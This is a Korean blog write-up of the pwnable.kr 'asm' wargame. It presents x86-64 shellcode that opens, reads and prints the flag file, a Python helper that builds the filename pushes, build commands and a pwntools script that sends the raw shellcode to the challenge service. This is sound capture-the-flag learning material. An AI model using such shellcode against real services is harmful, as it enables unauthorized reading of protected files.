본문 바로가기
Wargame/pwnable.kr

pwnable.kr asm

by morae23 2019. 2. 1.

[Toddler's Bottle] asm


ssh로 접속하면 아래와 같은 파일들을 볼 수 있다.




아래 사진은 소스코드의 일부이다.




open(), read(), write()를 이용하여 플래그 파일을 읽는 쉘코드를 입력하면 된다.


section .text

global _start


_start:


push 0x0

mov rax, 0x676e6f306f306f

push rax

mov rax, 0x306f306f306f306f

push rax

mov rax, 0x3030303030303030

push rax

mov rax, 0x303030306f6f6f6f

push rax

mov rax, 0x6f6f6f6f6f6f6f6f

push rax

mov rax, 0x6f6f6f6f6f6f6f6f

push rax

mov rax, 0x6f6f6f3030303030

push rax

mov rax, 0x3030303030303030

push rax

mov rax, 0x3030303030303030

push rax

mov rax, 0x303030306f6f6f6f

push rax

mov rax, 0x6f6f6f6f6f6f6f6f

push rax

mov rax, 0x6f6f6f6f6f6f6f6f

push rax

mov rax, 0x6f6f6f6f6f6f6f6f

push rax

mov rax, 0x6f6f6f6f6f6f6f6f

push rax

mov rax, 0x6f6f6f6f6f6f6f6f

push rax

mov rax, 0x6f6f6f6f6f6f6f6f

push rax

mov rax, 0x6f6f6f6f6f6f6f6f

push rax

mov rax, 0x6f6f6f6f6f6f6f6f

push rax

mov rax, 0x6f6f6f6f6f6f6f6f

push rax

mov rax, 0x6c5f797265765f73

push rax

mov rax, 0x695f656d616e5f65

push rax

mov rax, 0x6c69665f6568745f

push rax

mov rax, 0x7972726f732e656c

push rax

mov rax, 0x69665f736968745f

push rax

mov rax, 0x646165725f657361

push rax

mov rax, 0x656c705f656c6966

push rax

mov rax, 0x5f67616c665f726b

push rax

mov rax, 0x2e656c62616e7770

push rax

mov rax, 0x5f73695f73696874

push rax    ; push filepath


mov rdi, rsp

xor rax, rax

xor rsi, rsi

xor rdx, rdx

mov rax, 0x2    ; open()

syscall


mov rdi, rax

mov rsi, rsp

mov rdx, 0x100

mov rax, 0x0    ; read()

syscall


mov rdi, 0x1

mov rsi, rsp

mov rdx, 0x100

mov rax, 0x1    ; write()

syscall


xor rdi, rdi

mov rax, 0x3c   ; exit()

syscall



작성한 쉘코드를 보면 open(), read(), write(), exit()을 차례로 호출하는 것을 볼 수 있다.

먼저 64비트이기 때문에

systemcall table을 참고하여 rax에 시스템콜 번호를 넣어준다.

인자들은 rdi, rsi, rdx, rcx에 차례로 넣어주었다.


read()와 write()의 두 번째 인자인 버퍼는 rsp로 설정하였다.


파일명은 스택에 push한 뒤, rsp를 넘겨주는 방법을 이용하였다.

파일명이 길기 때문에 python을 이용하였다.


#!/usr/bin/env python


l = "this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong"


p = ['push 0x676e6f306f306f']

i = -8

while True:

tmp = ""

for j in range(8):

tmp += hex(ord(l[i-j]))[2:]

p.append('mov rax, 0x' + tmp + '\npush rax')

i -= 8

if i-8 < -232:

break


for i in p:

print i

이제 아래 명령어로 쉘코드를 컴파일한다.


nasm -f elf32 shell.s 
ld -m elf_i386 -o shell shell.o

익스 코드는 아래와 같다.

#!/usr/bin/env python


from pwn import *

p = remote("0.0.0.0", 9026)
print p.read()

p.send("\x6a\x00\x48\xb8\x6f\x30\x6f\x30\x6f\x6e\x67\x00\x50\x48\xb8\x6f\x30\x6f\x30\x6f\x30\x6f\x30\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x30\x30\x30\x30\x30\x6f\x6f\x6f\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x30\x30\x30\x30\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x30\x30\x30\x30\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x6f\x50\x48\xb8\x73\x5f\x76\x65\x72\x79\x5f\x6c\x50\x48\xb8\x65\x5f\x6e\x61\x6d\x65\x5f\x69\x50\x48\xb8\x5f\x74\x68\x65\x5f\x66\x69\x6c\x50\x48\xb8\x6c\x65\x2e\x73\x6f\x72\x72\x79\x50\x48\xb8\x5f\x74\x68\x69\x73\x5f\x66\x69\x50\x48\xb8\x61\x73\x65\x5f\x72\x65\x61\x64\x50\x48\xb8\x66\x69\x6c\x65\x5f\x70\x6c\x65\x50\x48\xb8\x6b\x72\x5f\x66\x6c\x61\x67\x5f\x50\x48\xb8\x70\x77\x6e\x61\x62\x6c\x65\x2e\x50\x48\xb8\x74\x68\x69\x73\x5f\x69\x73\x5f\x50\x48\x89\xe7\x48\x31\xc0\x48\x31\xf6\x48\x31\xd2\xb8\x02\x00\x00\x00\x0f\x05\x48\x89\xc7\x48\x89\xe6\xba\x00\x01\x00\x00\xb8\x00\x00\x00\x00\x0f\x05\xbf\x01\x00\x00\x00\x48\x89\xe6\xba\x00\x01\x00\x00\xb8\x01\x00\x00\x00\x0f\x05\x48\x31\xff\xb8\x3c\x00\x00\x00\x0f\x05")

p.interactive()


실행하면 아래와 같이 플래그를 얻을 수 있다.




'Wargame > pwnable.kr' 카테고리의 다른 글

pwnable.kr cmd2  (0) 2019.02.01
pwnable.kr cmd1  (0) 2019.02.01
pwnable.kr passcode  (0) 2019.02.01
pwnable.kr random  (0) 2019.02.01
pwnable.kr collision  (0) 2019.02.01

댓글0